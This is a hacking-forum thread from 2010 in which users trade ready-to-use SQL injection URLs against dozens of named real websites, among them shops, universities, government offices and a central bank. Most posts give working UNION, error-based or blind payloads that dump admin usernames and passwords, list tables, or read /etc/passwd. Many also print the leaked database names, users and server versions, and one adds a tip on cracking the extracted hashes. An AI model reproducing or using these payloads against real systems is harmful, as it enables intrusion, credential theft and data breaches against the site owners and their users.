Powered-by: PHP/5.2.12
DB Server: MySQL unknown ver
Current DB: suleyman
Code:
www.spravkatver.ru/look.php?cat_id=19&c_id=362&id=3449 AND %True_Expression%
Host IP: 77.221.130.43
Web Server: nginx/0.6.32
Powered-by: PHP/5.2.6-1+lenny8
DB Server: MySQL
Current DB: ),$
Code:
www.xmkj.net/look.php?id=45457 UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22--
Host IP: 121.199.124.72
Web Server: Apache/2.0.59 (Unix) DAV/2 mod_jk/1.2.26
Powered-by: PHP/4.4.9
DB Server: MySQL unknown ver
Current DB: zky081_db
Code:
www.stalpraas.com/eng/look.php?id=107 UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12,13,14--
Host IP: 85.17.197.141
Web Server: Apache/2
Powered-by: PHP/5.2.13
DB Server: MySQL
Current DB: stalpraa_website
Code:
www.diysuits.com/look.php?id=513 UNION ALL SELECT %String_Col%,2,3,4,5,6,7,8,9--
Host IP: 69.163.226.1
Web Server: Apache
Powered-by: PHP/5.2.13
DB Server: MySQL >=5
Current DB: frsuitssql
https://ws1.gaslightmedia.com/tomsmoms/retail_shop/display_product.phtml?cust_id=&user_num=&cust_status=guest&zip=&prod_id=4+union+select+null,null,null,null,null,nu ll,null,version()::int--+
--Repost--
http://www.supplierdiversityeurope.eu/news_details.php?id=-82+union+select+1,group_concat(0x0b,username,0x3a, password),3,4,5,6,7,8,9,10,11,12,13+from+SDE_users--
http://www.dulam.com/news_details.php?id=-9+union+select+1,2,3,group_concat(0x0b,Username,0x 3a,Password),5,6,7,8+from+dulam_admin--
http://www.businessanalytica.ru/ru/news/news_details.php?id=-66+union+select+1,2,3,4,group_concat(0x0b,table_na me)+from+information_schema.tables--
http://www.melker-online.de/addinol/news_details.php?id=-14+union+select+1,2,3,4,group_concat(0x0b,table_na me),6+from+information_schema.tables--
http://www.a1accommodation.com.au/news_details.php?id=-11+union+select+1,2,3,4,group_concat(0x0b,table_na me),6+from+information_schema.tables--
http://www.abraxascorp.com/news_details.php?id=-12+union+select+1,2,group_concat(0x0b,admin_login, 0x3a,admin_pass),4,5+from+admin--
DezMond™
21.07.2010, 15:20
newmexicohistory.org PR6 TIC10
Code:
http://www.newmexicohistory.org/filedetails.php?fileID=23133+union+select+1,2,3,4, concat_ws(0x3a3a,user_name,password)+from+adminUse r+--+
gloriousindia.com PR2
Code:
http://www.gloriousindia.com/unleashed/place.php?id=-228659+union+select+1,concat_ws(0x3a3a,email,passw ord,name,pwd),3,4,5,6,7,8,9,10+from+user+--+
celadon-international.com PR3 TIC10
Code:
http://www.celadon-international.com/place.php?id=-38+union+select+concat_ws(0x3a3a,username,password )+from+wh_users+--+
finance.tut.by PR5 TIC170
Code:
http://finance.tut.by/insurance.php?mode=company&id=-1'+union+select+1,2,concat_ws(0x3a3a,id,username,p assword,email,type),4,5,6,7,8,9,10,11,12,13+from+u sers+limit+1,100+--+
10.of.by PR5 TIC210
Code:
http://10.of.by/?pd=bWFuYWdlbWVudDp7dmlld19tb2RlPXNob3BfbmV3c2xpbm V9pz_pz_pz_&md=shop_newsline&news_id=-2272'+union+select+1,2,group_concat(table_name),4, 5,6,7,8+from+information_schema.tables+group+by+ta ble_schema+limit+2,1+--+
http://www.galeriapresenca.pt/site/index.php?pag=noticias&subpag=detalhe&id=51+union+select+cast(usename||chr(58)||passwd as int),null,null,null,null,null,null,null,null,null+ from+pg_user--
Code:
http://www.davico.co.uk/catalogue.asp?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,con cat_ws(char(58),version(),user(),database(),@@vers ion_compile_os),8,9,0,1,2,3,4,5,6,7,8,9--+
Version: 5.0.83-community-nt
User: davico@localhost
Database: davico
Os: Win32
http://rantburg.com PR-6
// check the Postgre version
http://rantburg.com/poparticle.php?ID=141137+union+select+cast(version () as int)+from+pg_user&D=2006-01-30&SO=&HC=1
// check access to pg_shadow
http://rantburg.com/poparticle.php?ID=141137+union+select+version()::i nt+from+pg_shadow&D=2006-01-30&SO=&HC=1
//cool! there is access to pg_shadow, let's try to pull the login and password
http://rantburg.com/poparticle.php?ID=141137+union+select+cast(usename ||chr(58)||passwd as int)+from+pg_shadow&D=2006-01-30&SO=&HC=1
P.S. I want to remind you that the first three characters of the hash are the encryption algorithm, in our case md5; when decrypting, this needs to be cut off
-PRIVAT-
21.07.2010, 21:35
http://www.dwstadium.co.uk/suite.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,0,1,2%20--
PR-5
http://www.analisi.ru/info.php?id=-7+union+select+1,group_concat%28column_name%29,3,4 %20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TAB LE_NAME=0x70687062625f61636c5f7573657273%20--
PR-60
TIC-3
SQLi:
Code:
http://www.kuroed.com/?id=158
Column: 1
User: kuroed@localhost
Version: 4.1.22-log
TIC: 90
-PRIVAT-
22.07.2010, 11:23
http://www.alphaonenow.org/info.php?id=-57+union+select+1,2,3,4,5,6,7,8,9,0,group_concat%2 8column_name%29,2,3,4,5,6,7,8,9,0,1,2%20FROM%20INF ORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME=0x766 25f61646d696e6973747261746f72%20--
PR-4
http://www.fourstarrealty.com/agent.php?id=-41+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7, 8%20--
PR-3
TIC-10
http://www.premiermontreal.com/agent.php?id=-37+union+select+1,2,3,4,5%20--
http://www.rav-riders.com/doc/motos/moto.php?id=-13+union+select+1,2,user(),4,5,6,7,8,9,0,1,2 --
PR-1
http://www.bullster.com/en/catalogue-moto.php?id=-93312+union+select+1,2,3,4%20--
PR-2
http://katalog.motorky.com/moto.php?id=-98+union+select+1,concat_ws%280x3a,id,username,pas sword%29,3,4,5,6,7,8,9+from+moto_users%20--
PR-4
http://www.banzai-moto.com/concession_kawasaki/banzai-fiche-moto.php?id=-54+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7, 8,9,0,1,2,3,4%20--
PR-1
http://www.fcl.ru/filial.php?id=-2+union+select+1 --
PR-1
TIC-10
http://infametr.ru/infa/-1079202+'+UNION+SELECT+1,concat_ws(0x3a,version(), user(),database()),3+--+
http://pics.kz/s5/e0/0d/c1/e00dc1463e06b0e55bf0780dc96cb085.gif
Very high traffic.
KENT1994
22.07.2010, 22:47
Code:
http://www.smolensk2.ru/user.php?login=v.v. AND %True_Expression%
Host IP: 80.93.48.50
Web Server: Apache/2.2.14 (Fedora)
Powered-by: PHP/5.2.9
DB Server: MySQL
http://deti.db.am/play/view/-82977+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,ve rsion(),user(),database()),9,10,11,12,13,14,15,16, 17,18,19,20,21+--+
Search engine.
http://www.itopfield.com.au/product-detail.asp?idx=1+or+1=(SELECT+TOP+1+cast(Username+ as+nvarchar)%2B'%3A'%2Bcast(Password+as+nvarchar)+ from+frmAuthor)
Microsoft SQL Server 2005
http://www.thefootballramble.com/blog-full.asp?id=-1+union+select+1,unhex(hex(version())),3,4,5
MySQL4 on Windows =\
http://www.focasa.com/landstart.asp?land=1' or 1=(SELECT TOP 1 cast(user_login as nvarchar)%2B'%3A'%2Bcast(user_password as nvarchar) FROM users)--
Microsoft SQL Server 2000 with German localization
http://athletics.menlo.edu/news.php?spcat=12345+and+1=cast((SELECT+version()| |chr(58)||current_user||chr(58)||current_database( ))+as+int)
PostgreSQL 8.3.7
http://www.eurotruss.nl/news_show.php?id=-1' union select 1,2,3,version(),5,6/*
MySQL5 without any sign of tables with user data..
shop
http://www.eliteshina.ru/tyreinfo.php?id=285+union+select+version()::int,nu ll,null,null,null,null,null+from+pg_user--
Skofield
23.07.2010, 21:28
Code:
http://www.domoticaviva.com/PHP/newsphp.php?id=-804+union+select+1,2,3,version%28%29,5,6,7,8/*
Database Version: 4.1.22
Database name: qbs057
User name: qbs057@217.76.130.103
-PRIVAT-
23.07.2010, 22:33
http://spb.egent.ru/metro/metro.php?id=-187+union+select+1,2,3%20--
TIC-20
http://www.agentam.ru/metro.php?id=-139+union+select+concat_ws%280x3a,id_ag,nameco,nam ,passwd%29+from+users--
TIC-10
PR-2
http://www.cyb-elles.org/popup/institut.php?id=-3+union+select+1,group_concat%28column_name%29,4,2 +from+information_schema.columns+where+table_name= 0x62645f666f72756d%20--
TIC-10
PR-3
cerd-rj.com.br pr 2
Code:
http://www.cerd-rj.com.br/cartilha.php?secao=12-999.9+union+select+1,2,3,4,concat_ws(0x3a,user(),v ersion(),database(),@@version_compile_os)--
tanaka-usa.com pr 5 TIC 10
Code:
http://www.tanaka-usa.com/index.php?section=156-999.9+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,us er(),version(),database(),@@version_compile_os),9, 10,11,12,13,14--
wordsbyrachel.com pr 1
Code:
http://wordsbyrachel.com/page.php?go=2-999.9+union+select+1,2,3,concat_ws(0x3a,user(),ver sion(),database(),@@version_compile_os)--
CyberHunter
24.07.2010, 14:24
http://www.chirurgie-hernie-paris.com/institut.php?id=30+and+substring(version(),1,1)=4--+
Version: 4
----------------
http://www.ipb-ild.edu.rs/institut.php?id=1027+and+substring(version(),1,1)= 3
Version: 3
----------------
http://www.agentam.ru/metro.php?id=-139+union+select+1--+
User: agent_db@localhost
Database: agent_db
Version: 5.0.77
CY: 10
PR: 2
Users
http://www.agentam.ru/metro.php?id=-139+union+select+concat(id_ag,0x3a,ident,0x3a,name co,0x3a,stat,0x3a,fam,0x3a,nam,0x3a,ot,0x3a,tel1,0 x3a,tel2,0x3a,email,0x3a,www,0x3a,icq,0x3a,acc,0x3 a,dat_in,0x3a,dat_last,0x3a,col_recs,0x3a,activ,0x 3a,ip,0x3a,passwd,0x3a,logo,0x3a,kod,0x3a,smscode) +from+users+limit+0,1--+
Mind-blowing, MySQL5. There are tables cpg14x_users fe_users be_users evo_users, but apparently there are no privileges to view them
http://www.stevens.edu/provost/news/single_news.php?news_events_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,6 8,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83--
iv. said:
Mind-blowing, MySQL5. There are tables cpg14x_users fe_users be_users evo_users, but apparently there are no privileges to view them
http://www.stevens.edu/provost/news/single_news.php?news_events_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_co ncat(user_name,char(58),user_password),14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, 51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 ,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83+f rom+cop.cpg14x_users
it's just a different database ))
SofiaLoar
24.07.2010, 15:29
http://www.keglia.ru/raskazread.php?idArticle=-17+union+select+concat_ws(0x3a,user_email,user_pas sword),2,3+from+phpbb_users+limit+1,1+--+
Repost: /raskazread.php?idArticle=-17+union+select+concat_ws(0x3a,user_email,user_pas sword),2,3+from+phpbb_users+limit+1,1+--+
http://azbyka.ru/znakomstva/index.php?module=community&file=user&id=9999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,concat_ws(0x3a,emai l,password,login),25,26,27,28,29,30,31,32,33,34,35 ,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,5 2,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68, 69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85 ,86,87,88+from+pravmamba_users+limit+0,1
-PRIVAT-
24.07.2010, 22:49
http://www.ivanivanich.ru/disc.php?id=-49+union+select+1,user%28%29,3,4,5,6,7,8,9,0%20--
ТИЦ-20
PR-1
http://www.mahaliajackson.us/discography/disc.php?id=-141+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 --
PR-2
http://assassinatecaesar.com/disc.php?id=-13+union+select+1,2,3,4,5,6,7,8,9,0,1,2%20--
http://joansanmarti.com/disc.php?id=-29+union+select+1,2,3,4,5,6,7,8%20--
PRIMORSK ship-repair enterprise
http://www.primorck.ru/index.php?sublist=-1+and+1=2+union+select+1,2,3,4,5,concat_ws(0x3a,@@ version,user(),database(),@@version_compile_os),7, 8,9,10+--
version : 5.0.91-community
user : primorck_goga@localhost
database : primorck_db
os : unknown-linux-gnu
Prosecutor's Office of the Chukotka Autonomous Okrug
http://prokuror.chukotnet.ru/index.php?section=4&action=view&id=-623+union+select+1,2,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),4,5,6,7,8,9,10 ,11,12&module=newsmodule&src=%40random45eb8fba06bd1
5.0.77rokurorrokuror@localhost:redhat-linux-gnu
arcsoft.com
Code:
http://www.arcsoft.com/press/viewrelease.asp?releaseid=189-999.9+union+select+1,database(),user(),4,5,6,7,8,9 ,10,version(),12,13--
PR 6
тиц 200
-PRIVAT-
25.07.2010, 02:20
http://news.franchiseindia.com/print_news.php?id=-2-213+union+select+1,2,1,1,2,3,4,5,1,7,8,9,0 --
ТИЦ-10
PR-5
http://www.utu.org/print_news.cfm?ArticleID=-51312+union+select+1,2 --
ТИЦ-10
PR-6
[Microsoft][ODBC Microsoft Access Driver]
http://www.thenewghanaian.com/print_news.asp?id=-801+or+1=%28SELECT+TOP+1+TABLE_NAME+FROM+INFORMATI ON_SCHEMA.TABLES%29--
PR-1
http://www.1c.lutsk.ua/print_news.php?id=-201+union+select+1,2,3,4,version%28%29,6%20--
ТИЦ-1300
PR-2
http://www.fbcwc.ca/print_news.php?id=-20+union+select+1,2,3,4%20--
PR-5
http://www.clarkrealtycapital.com/print_news.asp?id=-21767441+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3 --
PR-4
[Microsoft][ODBC SQL Server Driver]
http://www.ghanaonthenet.com/print_news.asp?id=1+or+1=%28SELECT+TOP+1+TABLE_NAM E+FROM+INFORMATION_SCHEMA.TABLES%29--
PR-2
[Microsoft][ODBC Microsoft Access Driver]
http://www.icdl.org.za/print_pages.php?id=-7+union+select+1,2,3,4,5,6 --
PR-1
CARC
http://www.carc.jo/pages_en.php?type=page&id=-3279+union+select+version()
PR-7
---
http://www.nooralhusseinfoundation.org/index.php?pager=end&task=view&type=content&pageid=-76+union+select+1,2,concat(username,char(58),passw ord),4,5,6,7+from+users--
PR-5
KENT1994
25.07.2010, 14:52
shops
Code:
http://www.ealandmania.net/catalogs/buy.php?c=1%27&p=4&o=79 AND %True_Expression% AND 'x'='x
Host IP: 208.76.82.37
Web Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
DB Server: MySQL
Current DB: T,# WQQS #C#,28Tx>f?}{Wryvp?~f???q?Y?o#50M??Bo?@xMF4??lT_c
Code:
http://www.mnsnowmobiler.org/index.php?pageid=92 AND %True_Expression%
Host IP: 198.31.50.252
Web Server: Apache/1.3.41 (Unix) FrontPage/5.0.2.2635 PHP/5.2.11 mod_ssl/2.8.31 OpenSSL/0.9.8i
Powered-by: PHP/5.2.11
DB Server: MySQL
Code:
http://www.ikancorp.com/productInfo.php?id=188%27 AND %True_Expression%
Host IP: 174.132.79.187
Web Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Powered-by: PHP/5.2.13
DB Server: MySQL
Code:
Repost!
Host IP: 74.52.164.178
Web Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Powered-by: PHP/5.2.13
DB Server: MySQL
Current DB: bugnbots_bugnbots
Code:
http://chinashoppingzone.com/productinfo.php?id=238%27 AND %True_Expression%
Host IP: 195.191.102.128
Web Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_perl/2.0.4 Perl/v5.8.8
DB Server: MySQL
Code:
Repost!
Host IP: 85.17.199.6
Web Server: Apache/2
Powered-by: PHP/5.2.13
DB Server: MySQL
Current DB: flashin_sparkms
Code:
http://shoppingtang.com/productinfo.php?id=186%27 AND %True_Expression%
Host IP: 173.201.111.157
Web Server: Apache
DB Server: MySQL
Code:
http://www.g20trade.com/productinfo.php?id=500%27 AND %True_Expression%
Host IP: 173.201.1.154
Web Server: Apache
DB Server: MySQL
Code:
http://www.chinashopunion.com/productinfo.php?id=103%27 AND %True_Expression%
Host IP: 97.74.137.145
Web Server: Apache
DB Server: MySQL
Code:
http://www.shopcarnival.com/productinfo.php?id=367%27 AND %True_Expression%
Host IP: 173.201.150.215
Web Server: Apache
DB Server: MySQL
Code:
http://storecarnival.com/productinfo.php?id=365%27 AND %True_Expression%
Host IP: 173.201.150.215
Web Server: Apache
DB Server: MySQL
Code:
http://www.sghgate.com/productinfo.php?id=606%27 AND %True_Expression%
Host IP: 195.191.102.57
Web Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_perl/2.0.4 Perl/v5.8.8
DB Server: MySQL
Code:
http://www.thegenealogist.co.uk/nameindex/productinfo.php?id=24%27 AND %True_Expression%
Host IP: 195.224.80.57
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
DB Server: MySQL
Code:
http://www.shopzooly.com/productinfo.php?id=751%27 AND %True_Expression%
Host IP: 173.201.150.242
Web Server: Apache
DB Server: MySQL
Code:
http://shelleysigns.co.uk/public_html/productinfo.php?id=204%27&KeepThis=true&TB_iframe=true&height=532&width=675 AND %True_Expression%
Host IP: 212.38.84.178
Web Server: Apache
DB Server: MySQL
Code:
Repost!
Host IP: 198.66.255.130
Web Server: Apache/2.2.15 (Unix) PHP/5.2.9 with Suhosin-Patch mod_ssl/2.2.15 OpenSSL/0.9.8m mod_apreq2-20051231/2.6.0 mod_perl/2.0.3 Perl/v5.8.7
Powered-by: PHP/5.2.9
DB Server: MySQL unknown ver
Current DB: atmweb
Code:
http://luckinthebox3.com/productinfo.php?id=209%27 AND %True_Expression%
Host IP: 173.201.81.179
Web Server: Apache
DB Server: MySQL
Code:
http://www.wishesg20.com/productinfo.php?id=429%27 AND %True_Expression%
Host IP: 173.201.0.93
Web Server: Apache
DB Server: MySQL
Code:
http://www.zoolystore.com/productinfo.php?id=1287%27 AND %True_Expression%
Host IP: 173.201.150.215
Web Server: Apache
DB Server: MySQL
Code:
Repost!
Host IP: 173.201.81.179
Web Server: Apache
DB Server: MySQL
Code:
http://www.hellozooly.com/productinfo.php?id=437%27 AND %True_Expression%
Host IP: 173.201.150.215
Web Server: Apache
DB Server: MySQL
Code:
http://rental.microsearch.com/productInfo.php?id=114%27 AND %True_Expression%
Host IP: 174.132.79.187
Web Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Powered-by: PHP/5.2.13
DB Server: MySQL
Code:
http://www.zoolystyle.com/productinfo.php?id=222%27 AND %True_Expression%
Host IP: 173.201.150.215
Web Server: Apache
DB Server: MySQL
+++
--------
Konqi: are you posting SQL injections that you already posted before???
/showthread.php?p=2133841
I already warned you, you know
Error-based blind SQLi
http://www.bsmotoring.com/storypage.php?autono=-1 or (select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2)))--
does anyone know how to output rows from the tables here? I kept fiddling with it and got nothing =\
"Russkoe Radio", "Radio Chanson" - Astrakhan
http://www.astrakhanfm.ru/news/news.php?id=-23047+and+1=2+union+select+1,2,concat_ws(char(58), @@version,user(),database(),@@version_compile_os), 4,5,6,7--&&rid=17
version : 4.1.22-lk-log
user : astrakhanru@localhost
database : astrakhanru
os : pc-linux-gnu
http://snews.awddesign.co.uk/snews/index.php?category=-3%20union%20select%200,version(),2,3,4,5,6,7,8
version: 4.1.22
user: awddesign_sn3@83.223.106.8
-PRIVAT-
26.07.2010, 19:36
http://www.webagro.net/printnews.php?id=92952+union+select+1,2,3,4,5,6,7, 8%20--
ТИЦ-150
PR-4
Code:
http://lxn.ru/index.php?id=870'%20union%20select%201,2,3,4,5
ТИЦ 30
PR 3
http://www.ghra.org/events.php?eventid=45+and+1=0+union+select+1,2,3,4 ,concat_ws(0x3a,user(),version(),database(),@@vers ion_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24--
some Chinese site, with cops running around
http://www.zszx.org/page.php?Id=-5661union+select+1,%20version(),3,4+--+
http://www.eco-schools.org/page.php?id=18+union+select+1,2,3,4,5+--+
Code:
http://www.tea-home.ru/userfiles/file/page.php?id=46'%20union%20select%201,2,3,4,5%20--
ТИЦ 0
PR 1
Code:
http://www.begopayrollservices.nl/detachering/cv-bank.php?ID=-13+union+select+1,2,3,4,5,6,7,8%20--
Code:
http://www.business-consultant.ru/page.php?id=262%20union%20select%201,2,3,4,5%20--
ТИЦ 0
PR 1
Code:
http://www.magnitogorsk.org/org/page.php?id=33'%20union%20select%201,2,3,4,5%20--
ТИЦ 20
PR 0
Code:
http://www.tehcomsnab.ru/page.php?id=54%20union%20select%201,2,3,4,5%20--
Code:
http://www.trimax.ru/page.php?id=139%20union%20select%201,2,3,4,5%20--
ТИЦ 10
PR 1
Code:
http://www.vip-poet.ru/page.php?id=7%20union%20select%201,2,3,4,5%20--
ТИЦ 20
PR 2
http://anavar.ru/articls/?id=100+union+select+1,2,3,4,5,6,7+--+
тиц 150
PR 3
Repost (/showpost.php?p=2210269&postcount=12411)
18+
http://7-ru.net/view_video.php?id=-56+union+select+1,2,3,4,5,6,7,8+--+
http://www.guamhome.com/irw/printlisting.php?lid=11458+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,aes_decrypt( aes_encrypt(LOAD_FILE(CHAR(47,101,116,99,47,112,97 ,115,115,119,100)),1),1),21,22,23,24,25,26,27,28,2 9,30,31,32+from+mysql.user--
http://www.guamhome.com/irw/printlisting.php?lid=11458+union+select+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,aes_decrypt( aes_encrypt(concat(user,char(58),password),1),1),2 1,22,23,24,25,26,27,28,29,30,31,32+from+mysql.user--
zoccolo.ru - in the search box on the main page, enter
Code:
')union/**/select/**/1,2,3,concat_ws(char(58),version(),user(),database (),@@version_compile_os)#
the query result is at the end of the page
Version: 5.0.26-lk-log
User: zoccolor@localhost
Database: zoccolor
Os: pc-linux-gnu
тИЦ — 190
PR — 5
if anyone knows how to take this kind of sql-inj further, I'd be glad to get a reply by PM...
Code:
http://www.nytc.org/dbacceptance.cfm?ID=-1+union+select+null,null,null,null,null,null,null, null,null,null,123,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null+from+r aces%00
ACCESS 2000
тИЦ — 10
PR — 4
Code:
http://www.club-perexod.ru/penews.php?id=-1+union+select+1,concat_ws(char(58),version(),user (),database(),@@version_compile_os),3,4,5,6,7,8--+
Version: 5.0.26-log
User: clubperexo@localhost
Database: clubperexo
Os: pc-linux-gnu
тИЦ — 20
http://www.channel5belize.com/archive_detail_story.php?story_id=-19702+union+select+1,2,3,4,5,6,group_concat(userna me,char(58),password)+from+admin_login--+
PR-6
-------
http://www.mmegi.bw/index.php?sid=1&aid=1'+or(1,1)=(select+count(0),concat((select+ver sion()+from+information_schema.tables+limit+0,1),f loor(rand(0)*2))from(information_schema.tables)+gr oup+by+2)--+&dir=2008/October/Wednesday8
http://www.mmegi.bw/phpinfo.php ))
PR-6
Code:
http://www.ksda.gov/open_records/id/1+or+1=(select+top+1+@@version+from+information_sc hema.tables)--+
Version: Microsoft SQL Server 2000 - 8.00.2055
Platform : Intel X86
OS: Windows NT 5.2 (Build 3790: Service Pack 2)
PR — 6
Code:
http://house.legis.state.la.us/H_Reps/members.asp?ID=-1+union+select+null,null,null,null,null,null,null, null,111,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null+from+MSysAccessO bjects
Version: Access 1997
PR — 5
http://www.bashkiakorce.gov.al/frontend/articles.php?cid=-144+union+select+1,2,3,4,version()--+
http://www.rockreport.be/review.asp?id=1414+union+select+1+--+
Yandex ТИЦ 10
Yandex RANK 2/6
Google PageRank 4/10
Code:
http://www.privacycorps.com/products/?id=-1+union+select+1,2,3,unhex(hex(concat_ws(char(58), version(),user(),database(),@@version_compile_os)) ),5,6,7,8,9,0,1,2,3--+
Version: 4.1.11-Debian_etch1-log
User: pcorps@web2.msomt.modwest.com
Database: privacycorps
OS: pc-linux-gnu
PR - 5
Code:
http://www.panicandaction.com/artists.php?id=-1+union+select+1,2,concat_ws(char(58),version(),us er(),database(),@@version_compile_os),4,5,6,7,8,9, 0,1,2--+
Version: 5.0.41
User: panicandaction.com@195.249.40.166
Database: panicandaction_com
OS: pc-linux-gnu
PR - 3
Code:
http://www.mussonjamaica.com/about_web.php?id=-1'+union+select+1,concat_ws(char(58),version(),use r(),database(),@@version_compile_os),3,4--+
Version: 5.0.45-community-nt
User: pdbuser@localhost
Database: mussonjamaica_webdb
OS: Win32
PR - 4
Code:
http://www.wingate.ru/products.php?todo=view&id=-1+union+select+1,2,3,concat_ws(char(58),version(), user(),database(),@@version_compile_os),5,6,7,8,9, 0--+
Version: 5.0.45
User: anysoft1_wing@localhost
Database: anysoft1_wing
OS: redhat-linux-gnu
тИЦ - 150
PR - 3
Code:
http://dendymaster.ru/index.php?pages=catalog&id=-1+union+select+1,concat_ws(char(58),version(),user (),database(),@@version_compile_os),3,4,5,6,7,8,9, 0--+
Version: 4.1.25-log
User: dendymas@localhost
Database: wwwdendymasterru
OS: portbld-freebsd6.2
тИЦ - 30
PR - 3
http://ironmiketyson.ru/article_read.php?id=1+gunion+select+1,2,3,4+--+
Kaliningrad
http://www.kaliningrad.yabloko.ru/news/index.phtml?id=-251+and+1=2+union+select+1,2,3,4,5,concat_ws(0x3a, @@version,user(),database(),@@version_compile_os), 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26+--
version : 5.0.51a-24+lenny4-log
user : kaliningrad@localhost
database : kaliningrad
os : debian-linux-gnu
Code:
http://www.adyashanti.org/index.php?file=writings_inner&writingid=-35+union+select+1,2,concat_ws(char(58),version(),u ser(),database(),@@version_compile_os),4,5,6--+
Version: 5.0.91-community
User: adyash2_ogs@localhost
Database: adyash2_ogs
OS: pc-linux-gnu
PR - 4
nemaniak
29.07.2010, 18:25
sdelanovspb.ru PR-5 ТИЦ-30
Code:
http://sdelanovspb.ru/print.php?news=-67+union+select+1,2,concat_ws%280x3a,version%28%29 ,user%28%29,database%28%29%29,4,5+--+
Code:
5.1.39-log:sdelanov@localhost:sdelanov
ndl-global.com PR-5 ТИЦ-190
Code:
http://ndl-global.com/print.php?news=-92+union+select+1,2,concat_ws%280x3a,version%28%29 ,user%28%29,database%28%29%29,4,5+--+
Code:
5.0.88-log:ndlprofy_test@217.112.35.67:ndlprofy_test
to nemaniak
sdelanovspb.ru PR-5 ТИЦ-30
Code:
http://sdelanovspb.ru/print.php?news=-67+union+select+1,2,cast%28concat%28table_name,0x3 a,column_name%29%20as%20binary%29,4,5+from+informa tion_schema.columns+where+column_name+like+0x25706 1737325--
Result:
Code:
http://sdelanovspb.ru/print.php?news=-67+union+select+1,2,concat%28user_login,0x3a,user_ pass%29,4,5+from+uw_users--
Trouble with the admin panel: there are two admin panels!
ndl-global.com PR-5 ТИЦ-190
Code:
http://ndl-global.com/print.php?news=-92+union+select+1,2,cast%28concat%28table_name,0x3 a,column_name%29%20as%20binary%29,4,5+from+informa tion_schema.columns+where+column_name+like+0x25706 1737325--
Result:
Code:
http://ndl-global.com/print.php?news=-92+union+select+1,2,concat%28user_login,0x3a,user_ pass%29,4,5+from+uw_users--
Same thing with the admin panel, it's one and the same server
Code:
http://www.rosconcert.com/common/arc/story.php?id_cr=-56+UNION+SELECT+concat_ws%280x3a,user%28%29,versio n%28%29,database%28%29%29%20from%20users--&id=19929
Username: russia@192.168.11.109
Version: 5.0.77
Database: cmn
Google PR:4 Тиц:350
A repost, of course, but something useful can be pulled out.
Code:
http://www.fc-dynamospb.ru/list.php?id=-15+UNION+SELECT+1,2,3,cast%28concat%28table_name,0 x3a,column_name%29%20as%20binary%29+from+informati on_schema.columns--
query to the database:
from newusers_2
Joomla! 1.5 - Open Source Content Management
Code:
http://www.ijoomla.com/index.php?option=com_ijoomla_archive&act=getall&task=archive&ptitle=iJoomla%20Magazine§ionid=-4+UNION+SELECT+concat_ws%280x3a,user%28%29,version %28%29,database%28%29%29--
Username: ijoomla_udevxt@localhost
Version: 5.0.91-community
Database: ijoomla_dijooverx
Google PR: 7
http://www.burs.org.bw/index.php?option=com_vat&id=-38+union+select+1,2,3,4,5,6,7,group_concat(usernam e,char(58),password),9,10,11+from+jos_users
DezMond™
01.08.2010, 21:29
Central Bank of Nepal
nrb.org.np
Code:
http://nrb.org.np/fxmexchangerate.php?YY=&&MM=&DD=-1'+union+select+1,2,concat_ws(0x3a3a,username,pass word,usertype),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45+from+user_valid ate+limit+4,1+--+
http://nrb.org.np/login/login.php
.....
Konqi: posting passwords is not allowed
